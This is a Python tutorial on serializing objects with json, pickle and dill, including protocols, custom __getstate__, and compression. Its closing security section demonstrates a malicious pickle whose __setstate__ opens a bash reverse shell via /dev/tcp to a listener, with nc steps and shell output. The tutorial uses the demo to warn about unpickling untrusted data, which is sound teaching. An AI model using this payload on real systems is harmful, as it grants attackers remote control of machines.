Pickle Module of Python

Developers sometimes need to save the internal state of their objects for later use or to send complex object hierarchies across a network. Serialization, which Python's standard library supports through the pickle module, makes this possible.

In this tutorial, we'll talk about serializing and deserializing objects and about which Python modules users can choose for the job. We'll see which kinds of objects the pickle module can serialize, how to use it to serialize object hierarchies, and what dangers a developer faces when deserializing an object from an untrusted source.

Python Serialization

Serialization transforms a data structure into a linear form that can be stored or transferred across a network.

In Python, serialization lets programmers turn a complex object structure into a stream of bytes that can be saved to disk or sent over a network. This process is also called marshalling. Deserialization is the reverse: it transforms a stream of bytes back into a data structure. This process is also called unmarshalling.

Serialization is useful in many different contexts. One common use is saving the internal state of a neural network after the training phase so that it can be used later without repeating the training.

The standard Python library has three modules that let programmers serialize and deserialize objects:

The pickle module
The marshal module
The json module

Python also supports XML, which developers can use to serialize objects.

Of the three, the json module is the most recent. It lets the developer work with standard JSON files. JSON is a convenient and widely used format for exchanging data.

The JSON format is preferred for a variety of reasons, including:

It is human-readable.
It is language-independent.
It is more lightweight than XML.

The developer can serialize and deserialize a variety of common Python types using the json Module:

List
Dict
String
Int
Tuple
Bool
Float
None
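As a rough sketch of the round trip, the snippet below serializes a dictionary built from these types with json.dumps() and reads it back with json.loads(). The variable names and sample values are made up for illustration. Note that a tuple comes back as a list, because JSON has only one array type.

```python
import json

# Hypothetical sample data built from the types listed above
record = {
    "name": "sensor",
    "count": 3,
    "ratio": 0.5,
    "active": True,
    "tags": ["a", "b"],
    "pair": (1, 2),      # tuples are written as JSON arrays
    "note": None,
}

text = json.dumps(record)      # a str containing JSON
restored = json.loads(text)    # back to Python objects

print(text)
print(restored["pair"])        # the tuple comes back as a list
```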

The marshal module is the oldest of the three. It exists mainly to read and write the compiled bytecode of Python modules, that is, the .pyc files that the interpreter produces when it imports a Python module. As a result, although the developer can use the marshal module to serialize objects, doing so is not advised.

The pickle module is another way to serialize and deserialize Python objects. It differs from the json module in that it serializes objects in a binary format, so the result is not human-readable. On the other hand, it works with many more Python types, including developer-defined custom objects, and is typically faster.

The developer therefore has several options for serializing and deserializing Python objects. The following three guidelines help determine which approach fits the developer's situation:

The marshal module shouldn't be used, because it exists mainly for the interpreter. The official documentation warns that its format can change in backward-incompatible ways.
The json module and XML are good options if the developer needs interoperability with other languages or a human-readable format.
The pickle module is the choice for all the remaining scenarios: when the developer does not need a human-readable or standard interoperable format, or when they need to serialize custom objects.
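The last guideline can be illustrated with a small sketch. It assumes a hypothetical Point class, which is not part of the tutorial's own examples: the json module rejects the instance unless a custom encoder is written, while pickle round-trips it directly.

```python
import json
import pickle

class Point:
    """Hypothetical custom class used only for this illustration."""
    def __init__(self, x, y):
        self.x = x
        self.y = y

point = Point(1, 2)

# json has no built-in encoding for arbitrary class instances
try:
    json.dumps(point)
    json_ok = True
except TypeError:
    json_ok = False

# pickle handles the instance without extra code
copy = pickle.loads(pickle.dumps(point))

print(json_ok)
print(copy.x, copy.y)
```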

Inside the pickle Module

Python's pickle module includes the following four functions:

dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)

The first two functions carry out the pickling process, and the last two carry out the unpickling process.

The difference between dump() and dumps() is that the former writes the serialization result to a file, while the latter returns it as a bytes object.

To tell them apart, the developer can remember that the "s" at the end of dumps() stands for string, a name that dates from Python 2; in Python 3 the result is a bytes object.

The functions load() and loads() work the same way: load() reads a file for the unpickling process, whereas loads() operates on a bytes object.
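A minimal sketch of the two pairs side by side is shown here. The sample dictionary and the file name data.pkl are assumptions made for illustration; the file is written to a temporary directory so nothing else is touched.

```python
import os
import pickle
import tempfile

data = {"numbers": [1, 2, 3], "label": "example"}

# dumps()/loads(): work with a bytes object in memory
blob = pickle.dumps(data)
from_bytes = pickle.loads(blob)

# dump()/load(): work with a file opened in binary mode
path = os.path.join(tempfile.mkdtemp(), "data.pkl")  # hypothetical file name
with open(path, "wb") as f:
    pickle.dump(data, f)
with open(path, "rb") as f:
    from_file = pickle.load(f)

print(type(blob))
print(from_bytes == data, from_file == data)
```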

Assume that the user has defined a custom class called forexample_class with several attributes, each of a different type:

the_number
the_string
the_list
the_dict
the_tuple

The following example shows how to create an instance of the class and pickle it to obtain a plain bytes object. Changing the value of an attribute after pickling does not affect the pickled bytes. The user can then unpickle those bytes into another variable to restore a copy of the originally pickled object.

Example:

# pickling.py (do not name the file pickle.py, or it will shadow the module)
import pickle

class forexample_class:
    the_number = 25
    the_string = "hello"
    the_list = [1, 2, 3]
    the_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
    the_tuple = (22, 23)

user_object = forexample_class()

user_pickled_object = pickle.dumps(user_object)  # Pickling the object
print(f"This is user's pickled object:\n{user_pickled_object}\n")

user_object.the_dict = None

user_unpickled_object = pickle.loads(user_pickled_object)  # Unpickling the object
print(f"This is the_dict of the unpickled object:\n{user_unpickled_object.the_dict}\n")

Output:

This is user's pickled object:
b'\x80\x04\x95$\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x10forexample_class\x94\x93\x94)\x81\x94.'

This is the_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}

Explanation

Here, the pickling process completed correctly and stored the user's instance in a bytes object: b'\x80\x04\x95$\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x10forexample_class\x94\x93\x94)\x81\x94.'. After pickling, the user changed the original object by setting its the_dict attribute to None.

When the user then unpickles the bytes, they get an entirely new instance that is a copy of the original object's structure as it was at the time of pickling.
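The class above keeps its values as class attributes, so the pickle records little more than which class to instantiate. A hedged variation with instance attributes, using a hypothetical Settings class that is not part of the original example, makes it easier to see that the pickled bytes hold a snapshot of the state at pickling time:

```python
import pickle

class Settings:
    """Hypothetical class whose values live on the instance."""
    def __init__(self):
        self.the_number = 25
        self.the_dict = {"first": "a", "second": 2}

original = Settings()
snapshot = pickle.dumps(original)   # state is captured here

original.the_dict = None            # later change to the original

restored = pickle.loads(snapshot)   # a new, independent instance
print(restored.the_dict)
print(restored is original)
```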

Python's Pickle Module Protocol Formats

The pickle module is specific to Python, so only another Python program can read its output. Even when working only with Python, the developer should know that the pickle module has evolved over time.

Accordingly, if the developer pickled an object with a specific Python version, they might be unable to unpickle it with an earlier version.

The pickle module currently supports six protocols. The higher the protocol version, the more recent the Python interpreter needed to unpickle the data.

Version 0 of the protocol was the initial release. Unlike the later protocols, it is human-readable.
Version 1 of the protocol was the first to use a binary format.
Version 2 of the protocol was introduced in Python 2.3.
Version 3 of the protocol was added in Python 3.0. Python 2.x is unable to unpickle it.
Version 4 of the protocol was added in Python 3.4. It supports a wider range of object sizes and types and is the default protocol starting with Python 3.8.
Version 5 of the protocol was added in Python 3.8.
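The protocol can be chosen through the protocol argument of dump() and dumps(). The sketch below, with made-up sample data, prints the default and highest protocol of the running interpreter and pickles the same object with protocol 0 and with the highest one available:

```python
import pickle

data = {"key": [1, 2, 3]}

print(pickle.DEFAULT_PROTOCOL)   # protocol used when none is given
print(pickle.HIGHEST_PROTOCOL)   # newest protocol this interpreter supports

# Protocol 0 is ASCII-based; higher protocols are binary
text_like = pickle.dumps(data, protocol=0)
binary = pickle.dumps(data, protocol=pickle.HIGHEST_PROTOCOL)

print(text_like)
print(pickle.loads(text_like) == pickle.loads(binary) == data)
```

Both results unpickle to the same object; only the on-disk representation differs.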

Picklable and Unpicklable Types

We've already seen that Python's pickle module can serialize many more types than the json module. However, not everything can be pickled.

Unpicklable objects include database connections, open network sockets, running threads, and many others.
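As a small illustration, a lock from the threading module can stand in for this kind of resource (the choice of a lock is an assumption made to keep the sketch self-contained). Trying to pickle it raises a TypeError:

```python
import pickle
import threading

lock = threading.Lock()   # wraps operating-system state, not plain data

try:
    pickle.dumps(lock)
    pickled = True
except TypeError as exc:
    pickled = False
    print(f"cannot pickle: {exc}")
```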

There aren't many options available to a user who is stuck with unpicklable objects. The first is to use a third-party library such as dill.

The dill library extends the capabilities of pickle. With it, users can serialize less common types, including nested functions, lambdas, functions with yields, and many more.

To test this module, the user can first try to pickle a lambda function with the standard pickle module.

For example:

import pickle  
squaring = lambda x: x * x  
user_pickle = pickle.dumps( squaring )

The Python pickle module cannot serialize the lambda function, so if the user tries to run this code, they will receive an exception.

Output:

PicklingError                             Traceback (most recent call last)
<ipython-input-9-1141f36c69b9> in <module>
      3 
      4 squaring = lambda x : x * x
----> 5 user_pickle = pickle.dumps(squaring)

PicklingError: Can't pickle <function <lambda> at 0x000001F1581DEE50>: attribute lookup <lambda> on __main__ failed

The user may now see the difference if they swap out the pickle module for the dill library.

For Example:

# pickle_dill.py
import dill

squaring = lambda x: x * x
user_pickle = dill.dumps( squaring )
print( user_pickle )

Output:

b'\x80\x04\x95\xb2\x00\x00\x00\x00\x00\x00\x00\x8c\ndill._dill\x94\x8c\x10_create_function\x94\x93\x94(h\x00\x8c\x0c_create_code\x94\x93\x94(K\x01K\x00K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00\x94N\x85\x94)\x8c\x01x\x94\x85\x94\x8c\x1f<ipython-input-11-30f1c8d0e50d>\x94\x8c\x08<lambda>\x94K\x04C\x00\x94))t\x94R\x94c__builtin__\n__main__\nh\nNN}\x94Nt\x94R\x94.'

The Dill library also has another intriguing feature: the ability to serialize an entire interpreter session.

For Example:

squaring = lambda x: x * x
p = squaring(25)
import math
q = math.sqrt(139)
import dill
dill.dump_session('testing.pkl')
exit()

In the above example, the user started the interpreter, defined the lambda function along with a few other variables, and imported the math module. They then imported the dill library and called the dump_session() function to serialize the whole session.

If the user has run the code correctly, they will get the testing.pkl file in their current directory.

Output:

$ ls testing.pkl
4 -rw-r--r--@ 1 dave  staff  493 Feb  12 09:52 testing.pkl

Now the user can start a new instance of the interpreter and load the testing.pkl file to restore their last session.

For example:

globals().items()

Output:

dict_items([('__name__', '__main__'), ('__doc__', 'Automatically created module for IPython interactive environment'), ('__package__', None), ('__loader__', None), ('__spec__', None), ('__builtin__', <module 'builtins' (built-in)>), ('__builtins__', <module 'builtins' (built-in)>), ('_ih', ['', 'globals().items()']), ('_oh', {}), ('_dh', ['C:\\Users\\User Name\\AppData\\Local\\Programs\\Python\\Python39\\Scripts']), ('In', ['', 'globals().items()']), ('Out', {}), ('get_ipython', <bound method InteractiveShell.get_ipython of <ipykernel.zmqshell.ZMQInteractiveShell object at 0x000001E1CDD8DDC0>>), ('exit', <IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70>), ('quit', <IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70>), ('_', ''), ('__', ''), ('___', ''), ('_i', ''), ('_ii', ''), ('_iii', ''), ('_i1', 'globals().items()')])


import dill
dill.load_session('testing.pkl')
globals().items()

Output:

dict_items([('__name__', '__main__'), ('__doc__', 'Automatically created module for IPython interactive environment'), ('__package__', None), ('__loader__', None), ('__spec__', None), ('__builtin__', <module 'builtins' (built-in)>), ('__builtins__', <module 'builtins' (built-in)>), ('_ih', ['', "squaring = lambda x: x * x\np = squaring(25)\nimport math\nq = math.sqrt(139)\nimport dill\ndill.dump_session('testing.pkl')\nexit()"]), ('_oh', {}), ('_dh', ['C:\\Users\\User Name\\AppData\\Local\\Programs\\Python\\Python39\\Scripts']), ('In', ['', "squaring = lambda x: x * x\np = squaring(25)\nimport math\nq = math.sqrt(139)\nimport dill\ndill.dump_session('testing.pkl')\nexit()"]), ('Out', {}), ('get_ipython', <bound method InteractiveShell.get_ipython of <ipykernel.zmqshell.ZMQInteractiveShell object at 0x000001E1CDD8DDC0>>), ('exit', <IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70>), ('quit', <IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70>), ('_', ''), ('__', ''), ('___', ''), ('_i', ''), ('_ii', ''), ('_iii', ''), ('_i1', "squaring = lambda x: x * x\np = squaring(25)\nimport math\nq = math.sqrt(139)\nimport dill\ndill.dump_session('testing.pkl')\nexit()"), ('_1', dict_items([('__name__', '__main__'), ('__doc__', 'Automatically created module for IPython interactive environment'), ('__package__', None), ('__loader__', None), ('__spec__', None), ('__builtin__', <module 'builtins' (built-in)>), ('__builtins__', <module 'builtins' (built-in)>)

The first globals().items() output shows that the interpreter starts in its initial state. After the developer imports the dill library and calls load_session(), the serialized session is restored: the second output contains the commands of the earlier session, and the names p, q, and squaring are available again.

Developers should remember that, unlike the pickle module, the dill library is not part of the standard library. It is also typically slower than the pickle module.

Although the dill library can serialize more objects than the pickle module, it cannot solve every serialization problem a developer may encounter. For example, an object that contains a database connection cannot be serialized even with dill.

The solution in this case is to exclude the connection from the serialization process and reinitialize it after the object is deserialized.

The developer can use the __getstate__() method to specify what should be included in the pickling process. If they do not override __getstate__(), the instance's default __dict__ is used.

In the example below, the user defines a class with a few attributes and then uses __getstate__() to exclude one of the attributes from serialization.

For Example:

# custom_pickle.py

import pickle

class foobar:
    def __init__( self ):
        self.p = 25
        self.q = " testing "
        self.r = lambda x: x * x

    def __getstate__( self ):
        attribute = self.__dict__.copy()
        del attribute[ 'r' ]
        return attribute

user_foobar_instance = foobar()
user_pickle_string = pickle.dumps( user_foobar_instance )
user_new_instance = pickle.loads( user_pickle_string )

print( user_new_instance.__dict__ )

In the example above, the user created an object with three attributes, one of which is a lambda, which the pickle module cannot pickle. To address this, they specified what to pickle in the __getstate__() method: it copies the instance's whole __dict__ so that all the attributes are included and then deletes the unpicklable attribute 'r'.

After running this code and deserializing the object, the user can observe that the new instance lacks the 'r' attribute.

Output:

{'p': 25, 'q': ' testing '}
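Excluding an attribute is often paired with __setstate__(), which pickle calls during unpickling, to rebuild what was left out. A minimal sketch, assuming a hypothetical Squarer class whose lambda stands in for a resource such as a database connection and can simply be recreated:

```python
import pickle

class Squarer:
    """Hypothetical class; 'r' stands in for an unpicklable resource."""
    def __init__(self):
        self.p = 25
        self.r = lambda x: x * x

    def __getstate__(self):
        state = self.__dict__.copy()
        del state["r"]              # leave the lambda out of the pickle
        return state

    def __setstate__(self, state):
        self.__dict__.update(state)
        self.r = lambda x: x * x    # recreate the excluded attribute

restored = pickle.loads(pickle.dumps(Squarer()))
print(restored.p, restored.r(4))
```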

Pickle Object Compression

Although the pickle data format is a compact binary representation of an object structure, users can still make their pickled data smaller by compressing it with gzip or bzip2.

To compress pickled data with bzip2, the user can use the bz2 module from Python's standard library.

As an illustration, the user pickles a string and then compresses it with the bz2 module.

For Example:

import pickle
import bz2
user_string = """Per me si va ne la città dolente,
per me si va ne l'etterno dolore,
per me si va tra la perduta gente.
Giustizia mosse il mio alto fattore:
fecemi la divina podestate,
la somma sapienza e 'l primo amore;
dinanzi a me non fuor cose create
se non etterne, e io etterno duro.
Lasciate ogne speranza, voi ch'intrate."""
pickling = pickle.dumps( user_string )
compressed = bz2.compress( pickling )
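len( user_string )

Output:

312

len( compressed )

The second call returns the size of the compressed data in bytes, which the user can compare with len( pickling ). The user needs to remember that a smaller file comes at the cost of a slower process.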
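The sketch below compares the pickled size with the bz2 and gzip results and shows that the data must be decompressed before unpickling. The sample list is made up for illustration, and the exact sizes depend on the data and the Python version, so none are quoted here.

```python
import bz2
import gzip
import pickle

# Made-up sample data with plenty of repetition
data = [f"record {i}: the same words repeat in every entry" for i in range(200)]

pickled = pickle.dumps(data)
with_bz2 = bz2.compress(pickled)
with_gzip = gzip.compress(pickled)

print(len(pickled), len(with_bz2), len(with_gzip))

# Decompress before unpickling to get the original object back
restored = pickle.loads(bz2.decompress(with_bz2))
print(restored == data)
```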

Concerns about the Pickle Module's security

Up until now, we've talked about using Python's pickle module to serialize and deserialize objects. Serialization is convenient when a developer wishes to save the state of their objects to disk or send it over a network.

However, developers also need to be aware that the Python pickle module is not secure. The __setstate__() method is useful for performing additional initialization during unpickling, but it can also be used to execute arbitrary code during the unpickling process.

A developer has few options for lowering this risk. The general rule is never to unpickle data that comes from an untrusted source or that was sent over an insecure network. To guard against tampering, the user can sign the data with a tool such as hmac and verify that it has not been changed.
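One way the signing idea might look is sketched below. The key, the sign() and safe_loads() helper names, and the payload are all assumptions made for illustration; only hmac.new(), hmac.compare_digest(), and the pickle calls come from the standard library. A signature proves only that the data was produced by someone holding the key, so the key itself must stay secret.

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b"replace-with-a-real-secret"   # hypothetical shared key

def sign(payload: bytes) -> bytes:
    """Return a SHA-256 HMAC for the pickled payload."""
    return hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()

def safe_loads(payload: bytes, signature: bytes):
    """Unpickle only if the signature matches the payload."""
    if not hmac.compare_digest(sign(payload), signature):
        raise ValueError("signature mismatch: refusing to unpickle")
    return pickle.loads(payload)

payload = pickle.dumps({"user": "alice"})
signature = sign(payload)

print(safe_loads(payload, signature))

# A payload changed in transit no longer matches its signature
tampered = payload + b"x"
try:
    safe_loads(tampered, signature)
    rejected = False
except ValueError:
    rejected = True
print(rejected)
```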

For Example:

The following code shows how unpickling a tampered pickle can expose the user's system to attackers.

# remote.py
import pickle
import os

class foobar:
    def __init__( self ):
        pass

    def __getstate__( self ):
        return self.__dict__

    def __setstate__( self, state ):
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        os.system('/bin/bash -c '
                  '"/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')


user_foobar = foobar()
user_pickle = pickle.dumps( user_foobar )
user_unpickle = pickle.loads( user_pickle )

In the example above, the unpickling process invokes __setstate__(), which runs a Bash command that opens a remote shell to the machine at 192.168.1.10 on port 8080.

The user can safely test this script on their own Mac or Linux machine. To listen for the connection on port 8080, they must first open a terminal and use the nc command. This terminal plays the role of the attacker.

Then, on the same computer, the user must open a second terminal and run the Python code that unpickles the malicious object.

The user must make sure that the IP address in the code is changed to the IP address of the attacking terminal. Running the code hands a shell to the attacker.

The attacking console will now display a bash shell. From this console, the attacker can operate directly on the compromised system.

Output:

bash: no job control in this shell

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208060.
bash-3.1$
